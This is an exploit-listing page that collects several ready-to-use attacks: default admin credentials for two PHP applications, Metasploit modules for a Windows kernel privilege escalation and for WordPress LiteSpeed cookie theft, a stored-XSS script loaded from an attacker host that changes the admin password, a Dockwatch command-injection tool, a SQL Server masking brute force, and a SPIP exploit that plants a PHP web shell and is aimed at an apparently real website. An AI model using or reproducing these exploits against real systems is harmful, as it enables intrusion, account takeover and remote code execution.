Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : food ordering and table reservation system for restaurants 1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_food-ordering-and-table-re.zip | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : Username: murja Password: 123 [+] http://127.0.0.1/food-ordering-and-table-reservation-system-for-restaurants-master/admin/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : Username: admin Password: Test@123 [+] http://127.0.0.1/bpmsp/admin/dashboard.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::Version include Msf::Exploit::Retry prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes', 'Description' => %q{ CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10, Windows 11 and Windows Server 2022. The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function. }, 'Author' => [ 'tykawaii98', # PoC (Bùi Quang Hiếu) 'jheysel-r7' # msf module ], 'References' => [ [ 'URL', 'https://github.com/tykawaii98/CVE-2024-30088'], [ 'CVE', '2024-30038'] ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Privileged' => true, 'SessionTypes' => [ 'meterpreter' ], 'Arch' => [ ARCH_X64 ], 'Targets' => [ [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DisclosureDate' => '2024-06-11', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, ], 'Reliability' => [UNRELIABLE_SESSION] # It should return a session on the first run although has the potential to fail. }, # After the first run the original session will usually die if the module is rerun against the same session. 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_sys_process_get_processes stdapi_railgun_api stdapi_sys_process_memory_allocate stdapi_sys_process_memory_protect stdapi_sys_process_memory_read stdapi_sys_process_memory_write ] } } ) ) end def target_compatible?(version) # NOTE: Win10_1607 = Server2016 and Win10_1809 = Server2019. Both Server and Desktop version are supposed to be affected. return true if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Rex::Version.new('10.0.10240.20680')) || version.build_number.between?(Msf::WindowsVersion::Win10_1607, Rex::Version.new('10.0.14393.7070')) || version.build_number.between?(Msf::WindowsVersion::Win10_1809, Rex::Version.new('10.0.17763.5936')) || version.build_number.between?(Msf::WindowsVersion::Win10_21H2, Rex::Version.new('10.0.19044.4529')) || version.build_number.between?(Msf::WindowsVersion::Win10_22H2, Rex::Version.new('10.0.19045.4529')) || version.build_number.between?(Msf::WindowsVersion::Win11_21H2, Rex::Version.new('10.0.22000.3019')) || version.build_number.between?(Msf::WindowsVersion::Win11_22H2, Rex::Version.new('10.0.22621.3737')) || version.build_number.between?(Msf::WindowsVersion::Win11_23H2, Rex::Version.new('10.0.22631.3737')) || version.build_number.between?(Msf::WindowsVersion::Server2022, Rex::Version.new('10.0.20348.2522')) || version.build_number.between?(Msf::WindowsVersion::Server2022_23H2, Rex::Version.new('10.0.25398.950')) false end def check return Exploit::CheckCode::Safe('Non Windows systems are not affected') unless session.platform == 'windows' version = get_version_info return Exploit::CheckCode::Appears("Version detected: #{version}") if target_compatible?(version) CheckCode::Safe("Version detected: #{version}") end def get_winlogon_pid processes = client.sys.process.get_processes winlogon_pid = nil processes.each do |process| if process['name'].downcase == 'winlogon.exe' winlogon_pid = process['pid'] break end end winlogon_pid end def get_winlogon_handle pid = session.sys.process.getpid process_handle = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) address = process_handle.memory.allocate(8) thread = execute_dll( ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30088', 'CVE-2024-30088.x64.dll'), address, pid ) calls = [ ['kernel32', 'WaitForSingleObject', [ thread.handle, 20000 ] ], ['kernel32', 'GetExitCodeThread', [ thread.handle, 4 ] ], ] results = session.railgun.multi(calls) winlogon_handle = nil if results.last['lpExitCode'] == 0 print_good('The exploit was successful, reading SYSTEM token from memory...') current_memory = process_handle.memory.read(address, 8) winlogon_handle = current_memory.unpack('Q<').first end session.railgun.kernel32.VirtualFree(address, 0, MEM_RELEASE) winlogon_handle end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end version = get_version_info unless target_compatible?(version) fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}") end winlogon_handle = get_winlogon_handle fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon handle') unless winlogon_handle print_good("Successfully stole winlogon handle: #{winlogon_handle}") winlogon_pid = get_winlogon_pid fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon pid') unless winlogon_pid print_good("Successfully retrieved winlogon pid: #{winlogon_pid}") host = session.sys.process.new(winlogon_pid, winlogon_handle) shellcode = payload.encoded shell_addr = host.memory.allocate(shellcode.length) host.memory.protect(shell_addr) if host.memory.write(shell_addr, shellcode) < shellcode.length fail_with(Failure::UnexpectedReply, 'Failed to write shellcode') end vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{winlogon_pid})") thread = host.thread.create(shell_addr, 0) unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread) fail_with(Failure::UnexpectedReply, 'Unable to create thread') end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck class DebugLogError < StandardError; end class WordPressNotOnline < StandardError; end class AdminCookieError < StandardError; end def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft', 'Description' => %q{ This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload. }, 'Author' => [ 'Rafie Muhammad', # discovery 'jheysel-r7' # module ], 'References' => [ [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'], [ 'CVE', '2024-44000'] ], 'License' => MSF_LICENSE, 'Privileged' => false, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [ [ 'PHP In-Memory', { 'Platform' => 'php', 'Arch' => ARCH_PHP # tested with php/meterpreter/reverse_tcp } ], [ 'Unix In-Memory', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD # tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows In-Memory', { 'Platform' => 'win', 'Arch' => ARCH_CMD } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2024-09-04', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) end def check @admin_cookie = get_valid_admin_cookie CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload') rescue WordPressNotOnline => e return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}") rescue DebugLogError => e return CheckCode::Safe("#{e.class}, #{e}") rescue AdminCookieError => e return CheckCode::Safe("#{e.class}, #{e}") end def extract_cookies(debug_log) admin_cookies = [] debug_log.each_line do |log_line| # 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/) admin_cookies << match.captures.compact.join('; ') if match end admin_cookies end def verify_admin_cookie(admin_cookies) admin_cookies.each do |admin_cookie| res = send_request_cgi({ 'uri' => '/wp-admin/', 'cookie' => admin_cookie }) return admin_cookie if res&.code == 200 end nil end def get_valid_admin_cookie raise WordPressNotOnline unless wordpress_and_online? res = send_request_cgi({ 'uri' => normalize_uri('wp-content', 'debug.log'), 'method' => 'GET' }) raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200 raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in') admin_cookies = extract_cookies(res.body) raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank? print_status('One or more potential admin cookies were found') admin_cookie = verify_admin_cookie(admin_cookies) raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie admin_cookie end def exploit unless @admin_cookie begin @admin_cookie = get_valid_admin_cookie print_good('Found and tested valid admin cookie, we can upload and execute a payload') rescue WordPressNotOnline => e fail_with(Failure::NotFound, "#{e.class}, #{e}") rescue DebugLogError, AdminCookieError => e fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}") end end print_status('Preparing payload...') plugin_name = Rex::Text.rand_text_alpha(10) payload_name = Rex::Text.rand_text_alpha(10).to_s payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) print_status('Uploading payload...') uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded print_status("Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php") register_dir_for_cleanup("../#{plugin_name}") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }) end end </code></pre>

<pre><code># Exploit Title: Stored XSS to Account Takeover - htmlyv2.9.9 # Date: 9/2024 # Exploit Author: Andrey Stoykov # Version: 2.9.9 # Tested on: Ubuntu 22.04 # Blog: https://msecureltd.blogspot.com/2024/08/friday-fun-pentest-series-9-stored-xss.html Description: - It was found that the application suffers from stored XSS - Low level user having an "author" role can takeover admin account and change their password via posting a malicious post with a reference to a payload hosted on attacker domain Stored XSS to Account Takeover #1: Steps to Reproduce: 1. Visit "My Posts" > "Add New Post" > "Regular Post" 2. Enter the following payload into the "Content" referencing externally hosted POC in Javascript: <script src="http://192.168.159.191:8000/xss.js"></script> 3. Upon visiting the blog post, the admin account password would be changed to "test" 4. In the XSS payload pasted below need to adjust the "passwordChangeUrl", "username" and "password" // Javascript POC // Function to fetch CSRF token and perform password change (function() { // URL of the password change page const passwordChangePageUrl = ' http://192.168.159.191/htmly/edit/password'; // Function to fetch the CSRF token function fetchCsrfToken() { fetch(passwordChangePageUrl, { method: 'GET', credentials: 'include' // Include cookies for the current session }) .then(response => response.text()) .then(html => { // Parse the HTML to find the CSRF token const parser = new DOMParser(); const doc = parser.parseFromString(html, 'text/html'); const csrfTokenInput = doc.querySelector('input[name="csrf_token"]'); if (csrfTokenInput) { const csrfToken = csrfTokenInput.value; console.log('CSRF Token:', csrfToken); changePassword(csrfToken); } else { console.error('CSRF token not found'); } }) .catch(error => console.error('Error fetching CSRF token:', error)); } // Function to change the password function changePassword(csrfToken) { const postData = new URLSearchParams(); postData.append('csrf_token', csrfToken); postData.append('username', 'admin'); postData.append('password', 'test'); fetch(passwordChangePageUrl, { method: 'POST', body: postData, headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, credentials: 'include' // Include cookies for the current session }) .then(response => response.text()) .then(data => { console.log('Password change response:', data); }) .catch(error => console.error('Error changing password:', error)); } // Trigger the CSRF token fetch and password change fetchCsrfToken(); })(); </code></pre>

<pre><code>#!/usr/bin/env python3 # -*- coding: UTF-8 -*- # # dockexec.py # # Dockwatch Remote Command Execution # # Jeremy Brown [jbrown3264/gmail] / Sept 2024 # # Intro # # Dockwatch is a container management web UI for docker. It runs by default # without authentication, although guidance is available for how to setup # credentials for access. It has a Commands feature that allows a user to # run docker commands such as inspect, network, ps. Prior to fix, it did not # restrict input for parameters, so both 'container' and 'parameters' for the # 'dockerInspect' command were vulnerable to shell command injection on the # container as the 'abc'user with (limited) command output. # # Example # # $ ./dockexec.py http://host:9999 "id" # uid=1001(abc) # gid=131(abc) # groups=131(abc),281(unraiddocker),1000(users) # # Workaround: echo "admin:[a-FANTASTIC-password]" > /config/logins # * DO NOT DO THIS: echo "" > /config/logins (* unless you want spacebar to work for user/pass) # # Fix: see commits 23df366 and c091e4c, kudos for maintainers for quick fixes # import sys import requests import re def clean_output(output): output = output.replace('[]', '') output = re.sub(r'Error: No such object:\s*', '', output) output = output.replace('command', '') output = output.replace('test\n', '') lines = [line.strip() for line in output.split('\n')] return '\n'.join(lines) def send_command(url, command): endpoint = f"{url}/ajax/commands.php" data = { 'm': 'runCommand', 'command': 'dockerInspect', 'container': command, 'parameters': 'test', # also affected 'servers': '0' } try: response = requests.post(endpoint, data=data) response.raise_for_status() match = re.search(r'<pre[^>]*>(.*?)</pre>', response.text, re.DOTALL) if match: output = clean_output(match.group(1)) if output: print("%s" % output) else: print("No output found.") else: print("No output found in the response.") except requests.exceptions.RequestException as error: print("An error occurred: %s" % error) if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: %s <url> <command>" % sys.argv[0]) sys.exit(1) url = sys.argv[1] command = "`" + sys.argv[2] + "`" send_command(url, command) </code></pre>

<pre><code>Title: SQL Server Masked Data Exposure Through Brute Force Attack Product: Database Manufacturer: Microsoft Affected Version(s): SQL Server 2014, 2016,2017,2019,2022 Tested Version(s): SQL Server 2014, 2016,2017,2019,2022 Risk Level: Low Security Feature: Dynamic Data Masking Author of Advisory: Emad Al-Mousa ***************************************** Vulnerability Details And Back Ground: Microsoft SQL Server database system has a security feature called "dynamic data masking" , this feature is designed to redact/mask column level values (columns containing sensitive data ….for example credit card number…etc). The feature is good but has many security weaknesses that organizations/companies should be aware of. Among them is brute force technique against the “where” conditional clause to retrieve actual data values (numeric values). ***************************************** Proof of Concept (PoC): I will create database called demodb and create table called dbo.COMPANY and insert dummy data in it: create database demodb; USE [demodb] GO SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO CREATE TABLE [dbo].[COMPANY]( [COMPANY_NAME] [nvarchar](max) NULL, [SALES] [int] NULL ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] GO USE [demodb] GO INSERT INTO [dbo].[COMPANY] ([COMPANY_NAME] ,[SALES]) VALUES ('COMPANY_C','93') GO USE [demodb] GO INSERT INTO [dbo].[COMPANY] ([COMPANY_NAME] ,[SALES]) VALUES ('COMPANY_A','11') GO USE [demodb] GO INSERT INTO [dbo].[COMPANY] ([COMPANY_NAME] ,[SALES]) VALUES ('COMPANY_B','78') GO ------ I will enable dynamic data masking function against SALES column: ALTER TABLE dbo.COMPANY ALTER COLUMN SALES INT MASKED WITH (FUNCTION = 'default()'); ------ Then, will create a user called reg_user that can only query the table, so the user will only see SALES column with complete masked data [ZERO values]: USE [demodb] GO CREATE USER reg_user WITHOUT LOGIN; GRANT SELECT ON dbo.COMPANY to reg_user; EXECUTE AS USER = 'reg_user'; SELECT * FROM dbo.COMPANY; REVERT; ------ However, using the same non-privileged database account reg_user …I will be able to extract Actual Values : EXECUTE AS USER = 'reg_user'; DECLARE @sales_txt nvarchar(max); DECLARE @LCounter INT= 1; WHILE (@LCounter < 99) BEGIN SET @sales_txt=(SELECT COMPANY_NAME+' sales is ' +CAST (@LCounter as nvarchar) FROM dbo.COMPANY WHERE SALES=@LCounter) print @sales_txt SET @LCounter = @LCounter + 1 END REVERT; Output: COMPANY_A sales is 11 COMPANY_B sales is 78 COMPANY_C sales is 93 ------ Actual values were successfully extracted from the masked column ! ***************************************** Protection Mechanisms: 1. Ensure network firewall rules are in-place to ensure database accounts can be connected to the destination database server host from specific list of source hosts. This will add good security protection layer especially if database account credentials were exposed. 2. Implement Security Auditing against identified sensitive tables. 3. Implement other security features along dynamic data masking such as encryption. of course Always Encrypted feature is the best in terms of data protection. ***************************************** References: https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16 https://databasesecurityninja.wordpress.com/2023/08/08/hacking-sql-server-dynamic-data-masking-feature-with-brute-force-technique/ https://www.youtube.com/watch?v=NiAg0sGsGtw </code></pre>

<pre><code>============================================================================================================================================= | # Title : SPIP BigUp 4.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.spip.net/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP. The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload . [+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php [+] Payload : <?php class indoushka { private $targetUri; private $formPage; private $payload; public function __construct($targetUri, $formPage = 'auto', $payload) { $this->targetUri = $targetUri; $this->formPage = $formPage; $this->payload = $payload; } public function check() { $spipVersion = $this->getSpipVersion(); if (!$spipVersion) { return "Unable to determine the version of SPIP."; } echo "SPIP Version detected: " . $spipVersion . "\n"; $vulnerableRanges = [ ['start' => '4.0.0', 'end' => '4.1.17'], ['start' => '4.2.0', 'end' => '4.2.15'], ['start' => '4.3.0', 'end' => '4.3.1'] ]; $isVulnerable = false; foreach ($vulnerableRanges as $range) { if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) { $isVulnerable = true; break; } } if (!$isVulnerable) { return "The detected SPIP version ($spipVersion) is not vulnerable."; } echo "SPIP version $spipVersion is vulnerable.\n"; return "SPIP version $spipVersion is vulnerable."; } private function getSpipVersion() { // This function should make an HTTP request to detect the SPIP version // Return the version or false if undetectable return '4.3.1'; // Example version, replace with actual logic } private function getFormData() { $pages = ['login', 'spip_pass', 'contact']; if ($this->formPage !== 'auto') { $pages = [$this->formPage]; } foreach ($pages as $page) { $url = $this->normalizeUri($page); $response = $this->sendRequest('GET', $url); if ($response['status'] === 200) { libxml_use_internal_errors(true); // Prevent warnings from invalid HTML $doc = new DOMDocument(); @$doc->loadHTML($response['body']); libxml_clear_errors(); $inputs = $doc->getElementsByTagName('input'); if ($inputs->length > 1) { $action = $inputs->item(0)->getAttribute('value'); $args = $inputs->item(1)->getAttribute('value'); if ($action && $args) { echo "Found formulaire_action: $action\n"; echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n"; return ['action' => $action, 'args' => $args]; } } } } return null; } private function normalizeUri($page) { return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/'); } private function sendRequest($method, $url, $data = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); if ($method === 'POST' && $data) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32) ]); } $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ['status' => $httpCode, 'body' => $response]; } private function encodePayload() { return base64_encode($this->payload); } public function exploit() { $formData = $this->getFormData(); if (!$formData) { echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n"; return; } echo "Preparing to send exploit payload to the target...\n"; $encodedPayload = $this->encodePayload(); $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16)); $postData = "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n"; $postData .= "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n"; $postData .= "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n"; $postData .= "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n"; $postData .= "--$boundary--\r\n"; $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData); } private function randomString($length = 8) { return bin2hex(random_bytes($length / 2)); } } // Usage example: $exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'); $exploit->check(); $exploit->exploit(); ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>